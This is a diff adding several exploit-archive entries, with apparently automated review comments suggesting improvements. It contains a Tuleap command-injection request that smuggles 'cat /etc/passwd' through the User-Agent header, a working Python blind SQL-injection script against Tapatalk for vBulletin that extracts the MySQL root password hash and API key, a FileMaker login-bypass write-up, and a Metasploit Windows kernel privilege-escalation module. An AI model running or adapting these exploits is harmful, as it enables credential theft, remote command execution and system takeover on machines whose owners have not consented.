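+After registering with the application and sending a request similar to the one below the vulnerability can be triggered:
+
+
+GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
+Host: [IP]
+User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://[IP]/svn/?group_id=102
+Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
+Connection: keep-alive
+Cache-Control: max-age=0
+
+
+Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
+
+
+Further details at:
+
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.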
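Review bot: The Details paragraph describes the flaw as exploitable by "external attackers", yet the PoC preamble ("After registering with the application") and the closing Note both require a registered account that can see an SVN repository, so the precondition should be stated once, up front, e.g. `Preconditions: authenticated Tuleap user with read access to an SVN repository in the target project.` The injection point is only implied by the request: a sentence such as `The User-Agent header is interpolated unescaped into the command line that /svn/viewvc.php passes to passthru()` would make it explicit (the advisory does not name the Tuleap source file, so that wording should be confirmed against the 7.5 fix before publishing). The payload also writes /etc/passwd into /usr/share/codendi/src/www/passwd.txt, which appears to be the served web root, leaving a publicly readable artifact on the target that testers should remove afterwards. Minor: "weather" should read "whether".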
233
platforms/php/webapps/35102.py
Executable file
|
@ -0,0 +1,233 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
'''
|
||||
@author: tintinweb 0x721427D8
|
||||
'''
|
||||
import urllib2, urllib
|
||||
import xmlrpclib,re, urllib2,string,itertools,time
|
||||
from distutils.version import LooseVersion
|
||||
|
||||
|
||||
class Exploit(object):
|
||||
def __init__(self, target, debug=0 ):
|
||||
self.stopwatch_start=time.time()
|
||||
self.target = target
|
||||
self.path = target
|
||||
self.debug=debug
|
||||
if not self.target.endswith("mobiquo.php"):
|
||||
self.path = self.detect_tapatalk()
|
||||
if not self.path:
|
||||
raise Exception("Could not detect tapatalk or version not supported!")
|
||||
self.rpc_connect()
|
||||
self.attack_func = self.attack_2
|
||||
|
||||
def detect_tapatalk(self):
|
||||
# request page, check for tapatalk banner
|
||||
handlers = [
|
||||
urllib2.HTTPHandler(debuglevel=self.debug),
|
||||
urllib2.HTTPSHandler(debuglevel=self.debug),
|
||||
|
||||
]
|
||||
ua = urllib2.build_opener(*handlers)
|
||||
ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
|
||||
data = ua.open(self.target).read()
|
||||
if self.debug:
|
||||
print data
|
||||
if not "tapatalkDetect()" in data:
|
||||
print "[xx] could not detect tapatalk. bye..."
|
||||
return None
|
||||
|
||||
# extract tapatalk version
|
||||
print "[ i] Taptalk detected ... ",
|
||||
path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
|
||||
path+="mobiquo.php"
|
||||
print "'%s' ... "%path,
|
||||
data = urllib.urlopen(path).read()
|
||||
version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
|
||||
if LooseVersion(version) <= LooseVersion("5.2.1"):
|
||||
print "v.%s :) - OK"%version
|
||||
return path
|
||||
print "v.%s :( - not vulnerable"%version
|
||||
return None
|
||||
|
||||
def rpc_connect(self):
|
||||
self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
|
||||
|
||||
def attack_1(self, sqli, sleep=2):
|
||||
|
||||
'''
|
||||
SELECT subscribethreadid
|
||||
FROM subscribethread AS subscribethread
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribethreadid = <INJECTION>
|
||||
AND subscribethreadid.userid = 0";
|
||||
|
||||
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
|
||||
'''
|
||||
|
||||
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
|
||||
query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
|
||||
|
||||
if self.debug:
|
||||
print """ SELECT subscribethreadid
|
||||
FROM subscribethread AS subscribethread
|
||||
LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
|
||||
WHERE subscribethreadid = %s
|
||||
AND subscribethread.userid = 0"""%query
|
||||
|
||||
return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
|
||||
|
||||
def attack_2(self, sqli, sleep=2):
|
||||
'''
|
||||
SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = <INJECTION>
|
||||
AND subscribeforum.userid = 0";
|
||||
|
||||
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
|
||||
'''
|
||||
|
||||
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
|
||||
query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
|
||||
|
||||
if self.debug:
|
||||
print """ SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = %s
|
||||
AND subscribeforum.userid = 0"""%query
|
||||
|
||||
return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
|
||||
|
||||
def attack_blind(self,sqli,sleep=2):
|
||||
return self.attack_func(sqli,sleep=sleep)
|
||||
#return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
|
||||
|
||||
def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
|
||||
'''
|
||||
provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
|
||||
'''
|
||||
|
||||
|
||||
hit = False
|
||||
# PHASE 1 - guess entry length
|
||||
print "[ ] trying to guess length ..."
|
||||
for guess_length in xrange(maxlength+1):
|
||||
q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
|
||||
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
|
||||
print ".",
|
||||
|
||||
if duration >= sleep-sleep/8:
|
||||
# HIT! - got length! => guess_length
|
||||
hit = True
|
||||
print ""
|
||||
break
|
||||
|
||||
if not hit:
|
||||
print "[ !!] unable to guess password length, check query!"
|
||||
return None
|
||||
|
||||
|
||||
print "[ *] LENGTH = %s"%guess_length
|
||||
|
||||
# PHASE 2 - guess password up to length
|
||||
print "[ ] trying to guess value ..."
|
||||
hits = 0
|
||||
result = ""
|
||||
for pos in xrange(guess_length):
|
||||
# for each char pos in up to guessed length
|
||||
for attempt in self.bruteforce(charset, 1):
|
||||
# probe all chars in charset
|
||||
#attempt = re.escape(attempt)
|
||||
if attempt == "%%":
|
||||
attempt= "\%"
|
||||
#LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
|
||||
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
|
||||
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
|
||||
#print result,attempt," ",duration
|
||||
print ".",
|
||||
if duration >= sleep-sleep/8:
|
||||
if case:
|
||||
# case insensitive hit - recheck case: this is drastically reducing queries needed.
|
||||
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
|
||||
self.stopwatch()
|
||||
self.attack_blind(q, sleep)
|
||||
duration = self.stopwatch()
|
||||
if duration >= sleep-sleep/8:
|
||||
attempt = attempt.lower()
|
||||
else:
|
||||
attempt = attempt.upper()
|
||||
# case sensitive - end
|
||||
|
||||
|
||||
|
||||
# HIT! - got length! => guess_length
|
||||
hits += 1
|
||||
print ""
|
||||
print "[ +] HIT! - %s[%s].."%(result,attempt)
|
||||
result += attempt
|
||||
break
|
||||
|
||||
if not hits==guess_length:
|
||||
print "[ !!] unable to guess password length, check query!"
|
||||
return None
|
||||
|
||||
print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
|
||||
return result
|
||||
|
||||
def bruteforce(self, charset, maxlength):
|
||||
return (''.join(candidate)
|
||||
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
|
||||
for i in range(1, maxlength + 1)))
|
||||
|
||||
def stopwatch(self):
|
||||
stop = time.time()
|
||||
diff = stop - self.stopwatch_start
|
||||
self.stopwatch_start=stop
|
||||
return diff
|
||||
|
||||
if __name__=="__main__":
|
||||
#googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
|
||||
DEBUG = False
|
||||
TARGET = "http://TARGET/vbb4/forum.php"
|
||||
x = Exploit(TARGET,debug=DEBUG)
|
||||
|
||||
print "[ ] TAPATALK for vBulletin 4.x - SQLi"
|
||||
print "[--] Target: %s"%TARGET
|
||||
if DEBUG: print "[--] DEBUG-Mode!"
|
||||
|
||||
print "[ +] Attack - sqli"
|
||||
|
||||
|
||||
query = u"-1 UNION SELECT 1%s"%unichr(0)
|
||||
if DEBUG:
|
||||
print u""" SELECT subscribeforumid
|
||||
FROM subscribeforum AS subscribeforum
|
||||
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
|
||||
WHERE subscribeforumid = %s
|
||||
AND subscribeforum.userid = 0"""%query
|
||||
|
||||
|
||||
print "[ *] guess mysql user/pass"
|
||||
print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
|
||||
column="password",
|
||||
charset="*"+string.hexdigits,
|
||||
maxlength=45) # usually 40 chars + 1 (*)
|
||||
|
||||
print "[ *] guess apikey"
|
||||
print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
|
||||
column='value',
|
||||
charset=string.ascii_letters+string.digits,
|
||||
maxlength=14,
|
||||
)
|
||||
|
||||
print "-- done --"
|
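--- a/platforms/windows/local/35077.txt
+++ b/platforms/windows/local/35077.txt
@@ -0,0 +1,64 @@
+Filemaker Login Bypass and Privilege Escalation
+=======================================================================
+
+[ADVISORY INFORMATION]
+
+Title: Filemaker Login Bypass and Privilege Escalation
+Discovery date: 19/10/2014
+Release date: 19/10/2014
+Vendor Homepage: www.filemaker.com
+Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
+Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
+
+[VULNERABILITY INFORMATION]
+
+Class: Authentication Bypass and Privilege Escalation
+Category: Desktop Application
+Severity: High
+CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C
+
+[AFFECTED PRODUCTS]
+
+This security vulnerability affects:
+
+* FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
+
+[VULNERABILITY DETAILS]
+
+There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file:
+On DBEngine dll, there is a function called MatchPasswordData:
+
+...
+...
+...
+5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0
+5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash.
+5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C]
+5BB8D54F 5F POP EDI
+5BB8D550 5E POP ESI
+5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated,
+so simply by changing a single bit you are able to bypass the login,
+also if your username is Admin, you can obtain a privilege escalation and full permissions on DB.
+5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
+5BB8D55A 5B POP EBX
+5BB8D55B 8BE5 MOV ESP,EBP
+5BB8D55D 5D POP EBP
+5BB8D55E C2 0400 RETN 4
+...
+...
+...
+
+
+it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed.
+
+[DISCLOSURE TIME-LINE]
+
+* 19/10/2014 - Public disclosure and simultaneously initial vendor contact.
+
+[DISCLAIMER]
+
+The author is not responsible for the misuse of the information provided in
+this security advisory. The advisory is a service to the professional security
+community. There are NO WARRANTIES with regard to this information. Any
+application or distribution of this information constitutes acceptance AS IS,
+at the user's own risk. This information is subject to change without notice.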
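--- a/platforms/windows/local/35101.rb
+++ b/platforms/windows/local/35101.rb
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+Rank = NormalRanking
+
+include Msf::Post::File
+include Msf::Post::Windows::Priv
+include Msf::Post::Windows::Process
+include Msf::Post::Windows::FileInfo
+include Msf::Post::Windows::ReflectiveDLLInjection
+
+def initialize(info={})
+super(update_info(info, {
+'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
+'Description' => %q{
+This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
+can be triggered through the use of TrackPopupMenu. Under special conditions, the
+NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
+code execution. This module has been tested successfully on Windows XP SP3, Windows
+2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
+2008 R2 SP1 64 bits.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # vulnerability discovery and exploit in the wild
+'juan vazquez', # msf module (x86 target)
+'Spencer McIntyre' # msf module (x64 target)
+],
+'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+'Platform' => 'win',
+'SessionTypes' => [ 'meterpreter' ],
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'thread',
+},
+'Targets' =>
+[
+# Tested on (32 bits):
+# * Windows XP SP3
+# * Windows 2003 SP2
+# * Windows 7 SP1
+# * Windows 2008
+[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+# Tested on (64 bits):
+# * Windows 7 SP1
+# * Windows 2008 R2 SP1
+[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+],
+'Payload' =>
+{
+'Space' => 4096,
+'DisableNops' => true
+},
+'References' =>
+[
+['CVE', '2014-4113'],
+['OSVDB', '113167'],
+['BID', '70364'],
+['MSB', 'MS14-058'],
+['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
+],
+'DisclosureDate' => 'Oct 14 2014',
+'DefaultTarget' => 0
+}))
+end
+
+def check
+os = sysinfo["OS"]
+
+if os !~ /windows/i
+return Exploit::CheckCode::Unknown
+end
+
+if sysinfo["Architecture"] =~ /(wow|x)64/i
+arch = ARCH_X86_64
+elsif sysinfo["Architecture"] =~ /x86/i
+arch = ARCH_X86
+end
+
+file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+major, minor, build, revision, branch = file_version(file_path)
+vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+# Neither target suports Windows 8 or 8.1
+return Exploit::CheckCode::Safe if build == 9200
+return Exploit::CheckCode::Safe if build == 9600
+
+if arch == ARCH_X86
+return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
+else
+return Exploit::CheckCode::Detected if build == 7601
+end
+
+return Exploit::CheckCode::Unknown
+end
+
+def exploit
+if is_system?
+fail_with(Exploit::Failure::None, 'Session is already elevated')
+end
+
+if check == Exploit::CheckCode::Safe
+fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+end
+
+if sysinfo["Architecture"] =~ /wow64/i
+fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+end
+
+print_status('Launching notepad to host the exploit...')
+notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+begin
+process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+print_good("Process #{process.pid} launched.")
+rescue Rex::Post::Meterpreter::RequestError
+# Reader Sandbox won't allow to create a new process:
+# stdapi_sys_process_execute: Operation failed: Access is denied.
+print_status('Operation failed. Trying to elevate the current process...')
+process = client.sys.process.open
+end
+
+print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+if target.arch.first == ARCH_X86
+dll_file_name = 'cve-2014-4113.x86.dll'
+else
+dll_file_name = 'cve-2014-4113.x64.dll'
+end
+
+library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
+library_path = ::File.expand_path(library_path)
+
+print_status("Injecting exploit into #{process.pid}...")
+exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+print_status("Exploit injected. Injecting payload into #{process.pid}...")
+payload_mem = inject_into_process(process, payload.encoded)
+
+# invoke the exploit, passing in the address of the payload that
+# we want invoked on successful exploitation.
+print_status('Payload injected. Executing exploit...')
+process.thread.create(exploit_mem + offset, payload_mem)
+
+print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+end
+
+end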
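Review bot: In `check`, `arch` stays nil when `sysinfo["Architecture"]` matches neither `/(wow|x)64/i` nor `/x86/i`, and the `else` branch then treats that unknown architecture as x64 and can still return `Detected` for build 7601; adding `return Exploit::CheckCode::Unknown if arch.nil?` before the build checks keeps the result honest. If `file_version(file_path)` cannot read win32k.sys it presumably yields nils, which the method silently reports as `Unknown` after printing a version of dots — worth a `vprint_error` so the operator knows the check itself failed rather than the build being unrecognised. The rescue comment in `exploit`, `# Reader Sandbox won't allow to create a new process`, describes a different module (an Adobe Reader sandbox scenario) and should say what actually applies here, e.g. `# Restricted sessions may not be able to spawn a process (stdapi_sys_process_execute: Access is denied); fall back to the current one`. The comment `# Neither target suports Windows 8 or 8.1` has a typo, "supports".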